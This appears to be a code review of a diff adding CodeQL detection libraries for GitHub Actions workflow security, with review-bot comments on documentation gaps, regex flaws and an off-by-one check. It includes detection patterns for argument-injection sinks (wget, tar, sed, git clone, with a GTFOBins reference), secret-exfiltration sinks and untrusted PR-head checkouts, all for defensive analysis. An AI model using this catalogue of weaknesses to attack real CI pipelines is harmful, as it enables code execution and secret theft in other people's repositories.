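Review bot: None of the public classes in `PoisonableSteps.qll` carries QLDoc, including the abstract `PoisonableStep` that the others specialise; suggest `/** A step that may execute code or configuration taken from an untrusted checkout or downloaded artifact. */` on the abstract class and one line per subclass naming its mechanism (data-model action, matched command, `actions/github-script` importing a workspace file, `actions/setup-node` with `cache: yarn`, local script, local action). `LocalScriptExecutionRunStep.getPath()` splits the captured path on spaces, so a path containing a space yields several partial results; a comment saying the split is meant to drop trailing arguments would make that heuristic explicit. In `JavascriptImportUsesStep` the pattern `.*github.workspace` leaves the dots unescaped and is applied to every trimmed line, so a commented-out `// require('./x')` is also counted; `github\\.workspace` and skipping lines that start with `//` would narrow it.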
+++ b/actions/ql/lib/codeql/actions/security/RequestForgeryQuery.qll
@@ -0,0 +1,22 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.DataFlow
+
+private class RequestForgerySink extends DataFlow::Node {
+ RequestForgerySink() { madSink(this, "request-forgery") }
+}
+
+/**
+ * A taint-tracking configuration for unsafe user input
+ * that is used to construct and evaluate a system command.
+ */
+private module RequestForgeryConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink }
+}
+
+/** Tracks flow of unsafe user input that is used to construct and evaluate a system command. */
+module RequestForgeryFlow = TaintTracking::Global;
diff --git a/actions/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/actions/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll
new file mode 100644
index 000000000000..18a480b1cecc
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll
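Review bot: The QLDoc on `RequestForgeryConfig` and on `RequestForgeryFlow` was copied from a command-injection query and says the input "is used to construct and evaluate a system command", which does not describe a sink tagged `request-forgery`. Suggest `A taint-tracking configuration for unsafe user input that is used to construct a request (request forgery).` for the module and `/** Tracks flow of unsafe user input that is used to construct a request. */` for `RequestForgeryFlow`.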
@@ -0,0 +1,21 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.DataFlow
+
+private class SecretExfiltrationSink extends DataFlow::Node {
+ SecretExfiltrationSink() { madSink(this, "secret-exfiltration") }
+}
+
+/**
+ * A taint-tracking configuration for untrusted data that reaches a sink where it may lead to secret exfiltration
+ */
+private module SecretExfiltrationConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof SecretExfiltrationSink }
+}
+
+/** Tracks flow of unsafe user input that is used in a context where it may lead to a secret exfiltration. */
+module SecretExfiltrationFlow = TaintTracking::Global;
diff --git a/actions/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/actions/ql/lib/codeql/actions/security/SelfHostedQuery.qll
new file mode 100644
index 000000000000..14d36ef0fa85
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/security/SelfHostedQuery.qll
@@ -0,0 +1,45 @@
+import actions
+
+bindingset[runner]
+predicate isGithubHostedRunner(string runner) {
+ // list of github hosted repos: https://github.com/actions/runner-images/blob/main/README.md#available-images
+ runner
+ .toLowerCase()
+ .regexpMatch("^(ubuntu-([0-9.]+|latest)|macos-([0-9]+|latest)(-x?large)?|windows-([0-9.]+|latest))$")
+}
+
+bindingset[runner]
+predicate is3rdPartyHostedRunner(string runner) {
+ runner.toLowerCase().regexpMatch("^(buildjet|warp)-[a-z0-9-]+$")
+}
+
+/**
+ * This predicate uses data available in the workflow file to identify self-hosted runners.
+ * It does not know if the repository is public or private.
+ * It is a best-effort approach to identify self-hosted runners.
+ */
+predicate staticallyIdentifiedSelfHostedRunner(Job job) {
+ exists(string label |
+ job.getATriggerEvent().getName() =
+ [
+ "issue_comment", "pull_request", "pull_request_review", "pull_request_review_comment",
+ "pull_request_target", "workflow_run"
+ ] and
+ label = job.getARunsOnLabel() and
+ not isGithubHostedRunner(label) and
+ not is3rdPartyHostedRunner(label)
+ )
+}
+
+/**
+ * This predicate uses data available in the job log files to identify self-hosted runners.
+ * It is a best-effort approach to identify self-hosted runners.
+ */
+predicate dynamicallyIdentifiedSelfHostedRunner(Job job) {
+ exists(string runner_info |
+ repositoryDataModel("public", _) and
+ workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), _,
+ job.getId(), _, _, runner_info) and
+ runner_info.indexOf("self-hosted:true") > 0
+ )
+}
diff --git a/actions/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/actions/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
new file mode 100644
index 000000000000..9668fce2ae00
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
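Review bot: `runner_info.indexOf("self-hosted:true") > 0` in `dynamicallyIdentifiedSelfHostedRunner` is off by one: `indexOf` is zero-based, so a `runner_info` string that begins with `self-hosted:true` is rejected; use `exists(runner_info.indexOf("self-hosted:true"))` or `runner_info.matches("%self-hosted:true%")`. The regex in `isGithubHostedRunner` only admits `ubuntu-*`, `macos-*` and `windows-*` labels with an optional `-large`/`-xlarge` suffix, so GitHub-hosted labels with other suffixes (the `ubuntu-24.04-arm` images, for instance) fall through `staticallyIdentifiedSelfHostedRunner` as self-hosted; a comment acknowledging that larger-runner and newer image labels are not distinguishable from this list would set expectations. `job.getARunsOnLabel()` may also yield an unevaluated expression such as `${{ matrix.os }}` that matches neither regex; whether that should count as self-hosted deserves a sentence in the predicate's QLDoc.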
@@ -0,0 +1,384 @@ +import actions +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources +private import codeql.actions.TaintTracking + +string checkoutTriggers() { + result = ["pull_request_target", "workflow_run", "workflow_call", "issue_comment"] +} + +/** + * A taint-tracking configuration for PR HEAD references flowing + * into actions/checkout's ref argument. + */ +private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + ( + // remote flow sources + source instanceof GitHubCtxSource + or + source instanceof GitHubEventCtxSource + or + source instanceof GitHubEventJsonSource + or + source instanceof MaDSource + or + // `ref` argument contains the PR id/number or head ref + exists(Expression e | + source.asExpr() = e and + ( + containsHeadRef(e.getExpression()) or + containsPullRequestNumber(e.getExpression()) + ) + ) + or + // 3rd party actions returning the PR head ref + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_ref" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and + e.getFieldName() = "head_ref" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadBranch", "pullRequestNumber"] + or + step.getCallee() = "github/branch-deploy" and e.getFieldName() = ["ref", "fork_ref"] + ) + ) + ) + } + + predicate isSink(DataFlow::Node sink) { + exists(Uses uses | + uses.getCallee() = "actions/checkout" and + uses.getArgumentExpr(["ref", "repository"]) = sink.asExpr() + ) + } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run | + pred 
instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) + ) + } +} + +module ActionsMutableRefCheckoutFlow = TaintTracking::Global; + +private module ActionsSHACheckoutConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source.asExpr().getATriggerEvent().getName() = + ["pull_request_target", "workflow_run", "workflow_call", "issue_comment"] and + ( + // `ref` argument contains the PR head/merge commit sha + exists(Expression e | + source.asExpr() = e and + containsHeadSHA(e.getExpression()) + ) + or + // 3rd party actions returning the PR head sha + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_sha" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and + e.getFieldName() = "head_sha" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadSha", "mergeCommitSha"] + ) + ) + ) + } + + predicate isSink(DataFlow::Node sink) { + exists(Uses uses | + uses.getCallee() = "actions/checkout" and + uses.getArgumentExpr(["ref", "repository"]) = sink.asExpr() + ) + } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) + ) + } +} + +module ActionsSHACheckoutFlow = TaintTracking::Global; + +bindingset[s] +predicate containsPullRequestNumber(string s) { + exists( + normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.number\\b", 
"\\bgithub\\.event\\.issue\\.number\\b", + "\\bgithub\\.event\\.pull_request\\.id\\b", + "\\bgithub\\.event\\.pull_request\\.number\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", + // heuristics + "\\bpr_number\\b", "\\bpr_id\\b" + ], _, _) + ) +} + +bindingset[s] +predicate containsHeadSHA(string s) { + exists( + normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", + "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", + "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", + "\\bgithub\\.event\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_suite\\.head_commit\\.id\\b", + "\\bgithub\\.event\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.head_commit\\.id\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_run\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.merge_group\\.head_sha\\b", + "\\bgithub\\.event\\.merge_group\\.head_commit\\.id\\b", + // heuristics + "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bmerge_sha\\b", "\\bpr_head_sha\\b" + ], _, _) + ) +} + +bindingset[s] +predicate containsHeadRef(string s) { + exists( + normalizeExpr(s) + .regexpFind([ + 
"\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b", + "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", + "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.merge_group\\.head_ref\\b", + // heuristics + "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bmerge_ref\\b", "\\bpr_head_ref\\b", + // env vars + "GITHUB_HEAD_REF", + ], _, _) + ) +} + +class SimplePRHeadCheckoutStep extends Step { + SimplePRHeadCheckoutStep() { + // This should be: + // artifact instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + exists(Uses uses | + this = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") and + uses.getATriggerEvent().getName() = checkoutTriggers() + ) + or + this instanceof GitMutableRefCheckout + or + this instanceof GitSHACheckout + or + this instanceof GhMutableRefCheckout + or + this instanceof GhSHACheckout + } +} + +/** Checkout of a Pull Request HEAD */ +abstract class PRHeadCheckoutStep extends Step { + abstract string getPath(); +} + +/** Checkout of a Pull Request HEAD ref */ +abstract class MutableRefCheckoutStep extends PRHeadCheckoutStep { } + +/** Checkout of a Pull Request HEAD ref */ +abstract class SHACheckoutStep extends PRHeadCheckoutStep { } + +/** Checkout of a Pull Request HEAD ref using actions/checkout action */ +class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesStep { + ActionsMutableRefCheckout() { + this.getCallee() = "actions/checkout" and + ( + exists( + 
ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink + | + ActionsMutableRefCheckoutFlow::flowPath(source, sink) and + this.getArgumentExpr(["ref", "repository"]) = sink.getNode().asExpr() + ) + or + // heuristic base on the step id and field name + exists(string value, Expression expr | + value.regexpMatch(".*(head|branch|ref).*") and expr = this.getArgumentExpr("ref") + | + expr.(StepsExpression).getStepId() = value + or + expr.(SimpleReferenceExpression).getFieldName() = value and + not expr instanceof GitHubExpression + or + expr.(NeedsExpression).getNeededJobId() = value + or + expr.(JsonReferenceExpression).getAccessPath() = value + or + expr.(JsonReferenceExpression).getInnerExpression() = value + ) + ) + } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then result = this.(UsesStep).getArgument("path") + else result = "GITHUB_WORKSPACE/" + } +} + +/** Checkout of a Pull Request HEAD ref using actions/checkout action */ +class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { + ActionsSHACheckout() { + this.getCallee() = "actions/checkout" and + ( + exists(ActionsSHACheckoutFlow::PathNode source, ActionsSHACheckoutFlow::PathNode sink | + ActionsSHACheckoutFlow::flowPath(source, sink) and + this.getArgumentExpr(["ref", "repository"]) = sink.getNode().asExpr() + ) + or + // heuristic base on the step id and field name + exists(string value, Expression expr | + value.regexpMatch(".*(head|sha|commit).*") and expr = this.getArgumentExpr("ref") + | + expr.(StepsExpression).getStepId() = value + or + expr.(SimpleReferenceExpression).getFieldName() = value and + not expr instanceof GitHubExpression + or + expr.(NeedsExpression).getNeededJobId() = value + or + expr.(JsonReferenceExpression).getAccessPath() = value + or + expr.(JsonReferenceExpression).getInnerExpression() = value + ) + ) + } + + override string getPath() { + if exists(this.(UsesStep).getArgument("path")) + then 
result = this.(UsesStep).getArgument("path") + else result = "GITHUB_WORKSPACE/" + } +} + +/** Checkout of a Pull Request HEAD ref using git within a Run step */ +class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { + GitMutableRefCheckout() { + exists(string cmd | this.getScript().getACommand() = cmd | + cmd.regexpMatch("git\\s+(fetch|pull).*") and + ( + (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) + or + exists(string varname, string expr | + expr = this.getInScopeEnvVarExpr(varname).getExpression() and + ( + containsHeadRef(expr) or + containsPullRequestNumber(expr) + ) and + exists(cmd.regexpFind(varname, _, _)) + ) + ) + ) + } + + override string getPath() { result = this.(Run).getWorkingDirectory() } +} + +/** Checkout of a Pull Request HEAD ref using git within a Run step */ +class GitSHACheckout extends SHACheckoutStep instanceof Run { + GitSHACheckout() { + exists(string cmd | this.getScript().getACommand() = cmd | + cmd.regexpMatch("git\\s+(fetch|pull).*") and + ( + containsHeadSHA(cmd) + or + exists(string varname, string expr | + expr = this.getInScopeEnvVarExpr(varname).getExpression() and + containsHeadSHA(expr) and + exists(cmd.regexpFind(varname, _, _)) + ) + ) + ) + } + + override string getPath() { result = this.(Run).getWorkingDirectory() } +} + +/** Checkout of a Pull Request HEAD ref using gh within a Run step */ +class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { + GhMutableRefCheckout() { + exists(string cmd | this.getScript().getACommand() = cmd | + cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and + ( + (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) + or + exists(string varname | + ( + containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) or + containsPullRequestNumber(this.getInScopeEnvVarExpr(varname).getExpression()) + ) and + exists(cmd.regexpFind(varname, _, _)) + ) + ) + ) + } + + override string getPath() { result = this.(Run).getWorkingDirectory() 
} +} + +/** Checkout of a Pull Request HEAD ref using gh within a Run step */ +class GhSHACheckout extends SHACheckoutStep instanceof Run { + GhSHACheckout() { + exists(string cmd | this.getScript().getACommand() = cmd | + cmd.regexpMatch("gh\\s+pr\\s+checkout.*") and + ( + containsHeadSHA(cmd) + or + exists(string varname | + containsHeadSHA(this.getInScopeEnvVarExpr(varname).getExpression()) and + exists(cmd.regexpFind(varname, _, _)) + ) + ) + ) + } + + override string getPath() { result = this.(Run).getWorkingDirectory() } +} diff --git a/actions/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll b/actions/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll new file mode 100644 index 000000000000..920b8ab9d209 --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll @@ -0,0 +1,22 @@ +import actions + +class KnownVulnerableAction extends UsesStep { + string vulnerable_action; + string fixed_version; + string vulnerable_version; + string vulnerable_sha; + + KnownVulnerableAction() { + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, fixed_version) and + this.getCallee() = vulnerable_action and + (this.getVersion() = vulnerable_version or this.getVersion() = vulnerable_sha) + } + + string getFixedVersion() { result = fixed_version } + + string getVulnerableAction() { result = vulnerable_action } + + string getVulnerableVersion() { result = vulnerable_version } + + string getVulnerableSha() { result = vulnerable_sha } +} diff --git a/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll new file mode 100644 index 000000000000..ef258fce2e5c --- /dev/null +++ b/actions/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll 
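Review bot: `GhSHACheckout` matches commands with `"gh\\s+pr\\s+checkout.*"` while its sibling `GhMutableRefCheckout` uses `".*(gh|hub)\\s+pr\\s+checkout.*"`, so a `hub pr checkout` or a `gh pr checkout` preceded by an env assignment or `cd dir &&` is recognised as a mutable-ref checkout but not as a SHA checkout; align the SHA variant on the broader pattern. `ActionsSHACheckoutConfig.isSource` repeats the literal list `["pull_request_target", "workflow_run", "workflow_call", "issue_comment"]` instead of calling `checkoutTriggers()`, which is defined at the top of the file for that purpose and already used in `SimplePRHeadCheckoutStep`. The QLDoc of `SHACheckoutStep`, `ActionsSHACheckout`, `GitSHACheckout` and `GhSHACheckout` reads "Checkout of a Pull Request HEAD ref", copied from the ref variants; these should say "HEAD SHA". Comment typos: "heuristic base on" → "heuristic based on" (twice), and "anc causes a non-Monolitic Recursion" → "and causes a non-monotonic recursion".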
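Review bot: `KnownVulnerableAction` and its four getters have no QLDoc, and the column order of `vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, fixed_version)` is only implied by the field names; a class comment such as `A step using an action at a version or commit SHA listed as vulnerable in the vulnerable-actions data model.` plus a one-liner per getter would let a reader check the mapping against the model. The version comparison is exact (`this.getVersion() = vulnerable_version`), so a workflow pinning `v1` when the model lists `v1.2.3`, or the reverse, is not reported; if that is intended, state it in the class comment.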
@@ -0,0 +1,28 @@ +import actions + +class UnversionedImmutableAction extends UsesStep { + string immutable_action; + + UnversionedImmutableAction() { + isImmutableAction(this, immutable_action) and + not isSemVer(this.getVersion()) + } +} + +bindingset[version] +predicate isSemVer(string version) { + // https://semver.org/#is-there-a-suggested-regular-expression-regex-to-check-a-semver-string with optional v prefix + version + .regexpMatch("^v?(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$") or + // or N or N.x or N.N.x with optional v prefix + version.regexpMatch("^v?[1-9]\\d*$") or + version.regexpMatch("^v?[1-9]\\d*\\.(x|0|([1-9]\\d*))$") or + version.regexpMatch("^v?[1-9]\\d*\\.(0|([1-9]\\d*))\\.(x|0|([1-9]\\d*))$") or + // or latest which will work + version = "latest" +} + +predicate isImmutableAction(UsesStep actionStep, string actionName) { + immutableActionsDataModel(actionName) and + actionStep.getCallee() = actionName +} diff --git a/actions/ql/lib/codeql/files/FileSystem.qll b/actions/ql/lib/codeql/files/FileSystem.qll new file mode 100644 index 000000000000..552b85a4673f --- /dev/null +++ b/actions/ql/lib/codeql/files/FileSystem.qll 
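Review bot: `UnversionedImmutableAction` binds `immutable_action` in its constructor but exposes no getter, so a query built on this class cannot name the matched action in its alert message; add `string getActionName() { result = immutable_action }`. `isSemVer` accepts `latest` as a version (the inline comment says it "will work"), yet `latest` is a moving tag, which sits oddly with a check whose purpose is immutable references — please confirm that is intended and record the reason in QLDoc rather than an inline comment. The shorthand regexes accept `1`, `1.x` and `1.2.x` but not `1.x.x`, which may or may not be deliberate. None of the class, `isSemVer` or `isImmutableAction` has QLDoc.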
@@ -0,0 +1,177 @@ +/** Provides classes for working with files and folders. */ + +private import codeql.Locations + +/** A file or folder. */ +abstract class Container extends @container { + /** Gets a file or sub-folder in this container. */ + Container getAChildContainer() { this = result.getParentContainer() } + + /** Gets a file in this container. */ + File getAFile() { result = this.getAChildContainer() } + + /** Gets a sub-folder in this container. */ + Folder getAFolder() { result = this.getAChildContainer() } + + /** + * Gets the absolute, canonical path of this container, using forward slashes + * as path separator. + * + * The path starts with a _root prefix_ followed by zero or more _path + * segments_ separated by forward slashes. + * + * The root prefix is of one of the following forms: + * + * 1. A single forward slash `/` (Unix-style) + * 2. An upper-case drive letter followed by a colon and a forward slash, + * such as `C:/` (Windows-style) + * 3. Two forward slashes, a computer name, and then another forward slash, + * such as `//FileServer/` (UNC-style) + * + * Path segments are never empty (that is, absolute paths never contain two + * contiguous slashes, except as part of a UNC-style root prefix). Also, path + * segments never contain forward slashes, and no path segment is of the + * form `.` (one dot) or `..` (two dots). + * + * Note that an absolute path never ends with a forward slash, except if it is + * a bare root prefix, that is, the path has no path segments. A container + * whose absolute path has no segments is always a `Folder`, not a `File`. + */ + abstract string getAbsolutePath(); + + /** + * Gets the base name of this container including extension, that is, the last + * segment of its absolute path, or the empty string if it has no segments. + * + * Here are some examples of absolute paths and the corresponding base names + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + * + *
Absolute pathBase name
"/tmp/tst.go""tst.go"
"C:/Program Files (x86)""Program Files (x86)"
"/"""
"C:/"""
"D:/"""
"//FileServer/"""
+ */ + string getBaseName() { + result = this.getAbsolutePath().regexpCapture(".*/(([^/]*?)(?:\\.([^.]*))?)", 1) + } + + /** + * Gets the extension of this container, that is, the suffix of its base name + * after the last dot character, if any. + * + * In particular, + * + * - if the name does not include a dot, there is no extension, so this + * predicate has no result; + * - if the name ends in a dot, the extension is the empty string; + * - if the name contains multiple dots, the extension follows the last dot. + * + * Here are some examples of absolute paths and the corresponding extensions + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + *
Absolute pathExtension
"/tmp/tst.go""go"
"/tmp/.classpath""classpath"
"/bin/bash"not defined
"/tmp/tst2."""
"/tmp/x.tar.gz""gz"
+ */ + string getExtension() { + result = this.getAbsolutePath().regexpCapture(".*/([^/]*?)(\\.([^.]*))?", 3) + } + + /** Gets the file in this container that has the given `baseName`, if any. */ + File getFile(string baseName) { + result = this.getAFile() and + result.getBaseName() = baseName + } + + /** Gets the sub-folder in this container that has the given `baseName`, if any. */ + Folder getFolder(string baseName) { + result = this.getAFolder() and + result.getBaseName() = baseName + } + + /** Gets the parent container of this file or folder, if any. */ + Container getParentContainer() { containerparent(result, this) } + + /** + * Gets the relative path of this file or folder from the root folder of the + * analyzed source location. The relative path of the root folder itself is + * the empty string. + * + * This has no result if the container is outside the source root, that is, + * if the root folder is not a reflexive, transitive parent of this container. + */ + string getRelativePath() { + exists(string absPath, string pref | + absPath = this.getAbsolutePath() and sourceLocationPrefix(pref) + | + absPath = pref and result = "" + or + absPath = pref.regexpReplaceAll("/$", "") + "/" + result and + not result.matches("/%") + ) + } + + /** + * Gets the stem of this container, that is, the prefix of its base name up to + * (but not including) the last dot character if there is one, or the entire + * base name if there is not. + * + * Here are some examples of absolute paths and the corresponding stems + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + *
Absolute pathStem
"/tmp/tst.go""tst"
"/tmp/.classpath"""
"/bin/bash""bash"
"/tmp/tst2.""tst2"
"/tmp/x.tar.gz""x.tar"
+ */ + string getStem() { + result = this.getAbsolutePath().regexpCapture(".*/([^/]*?)(?:\\.([^.]*))?", 1) + } + + /** + * Gets a URL representing the location of this container. + * + * For more information see https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/#providing-urls. + */ + abstract string getURL(); + + /** + * Gets a textual representation of the path of this container. + * + * This is the absolute path of the container. + */ + string toString() { result = this.getAbsolutePath() } +} + +/** A folder. */ +class Folder extends Container, @folder { + override string getAbsolutePath() { folders(this, result) } + + /** Gets the URL of this folder. */ + override string getURL() { result = "folder://" + this.getAbsolutePath() } +} + +/** A file. */ +class File extends Container, @file { + override string getAbsolutePath() { files(this, result) } + + /** Gets the URL of this file. */ + override string getURL() { result = "file://" + this.getAbsolutePath() + ":0:0:0:0" } + + /** Holds if this file was extracted from ordinary source code. */ + predicate fromSource() { any() } +} diff --git a/actions/ql/lib/ext/config/argument_injection_sinks.yml b/actions/ql/lib/ext/config/argument_injection_sinks.yml new file mode 100644 index 000000000000..3214ce522876 --- /dev/null +++ b/actions/ql/lib/ext/config/argument_injection_sinks.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: argumentInjectionSinksDataModel + # https://gtfobins.github.io/ + # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection + data: + - ["(awk)\\s(.*?)", 1, 2] + - ["(find)\\s(.*?)", 1, 2] + - ["(git clone)\\s(.*?)", 1, 2] + - ["(sed)\\s(.*?)", 1, 2] + - ["(tar)\\s(.*?)", 1, 2] + - ["(wget)\\s(.*?)", 1, 2] + - ["(zip)\\s(.*?)", 1, 2] + 
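Review bot: The sink patterns have no leading word boundary, so `(sed)\s(.*?)` also matches inside `parsed file` or `used x`, and `(find)\s` inside `pathfind ` — unless the consumer of `argumentInjectionSinksDataModel` anchors them, which is not visible in this hunk. Prefixing each with `\b` (`\b(sed)\s+(.*?)`) and allowing `\s+` for repeated whitespace (`(git clone)` currently requires exactly one space between `git` and `clone`) makes the table robust regardless of how it is applied. Note also that a lazy `(.*?)` captures an empty string under `regexpFind` and the remainder of the command only under a full-match predicate, so the meaning of the second capture group depends on the consumer; a comment in the file stating which predicate applies these would prevent later misuse.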
diff --git a/actions/ql/lib/ext/config/context_event_map.yml b/actions/ql/lib/ext/config/context_event_map.yml new file mode 100644 index 000000000000..930a4344e12e --- /dev/null +++ b/actions/ql/lib/ext/config/context_event_map.yml 
@@ -0,0 +1,53 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: contextTriggerDataModel
+ data:
+ - ["commit_comment", "github.event.comment"]
+ - ["commit_comment", "github.event.changes"]
+ - ["discussion", "github.event.discussion"]
+ - ["discussion", "github.event.changes"]
+ - ["discussion_comment", "github.event.comment"]
+ - ["discussion_comment", "github.event.discussion"]
+ - ["discussion_comment", "github.event.changes"]
+ - ["issues", "github.event.issue"]
+ - ["issues", "github.event.changes"]
+ - ["issue_comment", "github.event.issue"]
+ - ["issue_comment", "github.event.comment"]
+ - ["issue_comment", "github.event.changes"]
+ - ["gollum", "github.event.pages"]
+ - ["gollum", "github.event.changes"]
+ - ["pull_request_comment", "github.event.comment"]
+ - ["pull_request_comment", "github.event.pull_request"]
+ - ["pull_request_comment", "github.head_ref"]
+ - ["pull_request_comment", "github.event.changes"]
+ - ["pull_request_review", "github.event.pull_request"]
+ - ["pull_request_review", "github.event.review"]
+ - ["pull_request_review", "github.head_ref"]
+ - ["pull_request_review", "github.event.changes"]
+ - ["pull_request_review_comment", "github.event.comment"]
+ - ["pull_request_review_comment", "github.event.pull_request"]
+ - ["pull_request_review_comment", "github.event.review"]
+ - ["pull_request_review_comment", "github.head_ref"]
+ - ["pull_request_review_comment", "github.event.changes"]
+ - ["pull_request_target", "github.event.pull_request"]
+ - ["pull_request_target", "github.head_ref"]
+ - ["pull_request_target", "github.event.changes"]
+ - ["push", "github.event.commits"]
+ - ["push", "github.event.head_commit"]
+ - ["push", "github.event.changes"]
+ - ["workflow_run", "github.event.workflow"]
+ - ["workflow_run", "github.event.workflow_run"]
+ - ["workflow_run", "github.event.changes"]
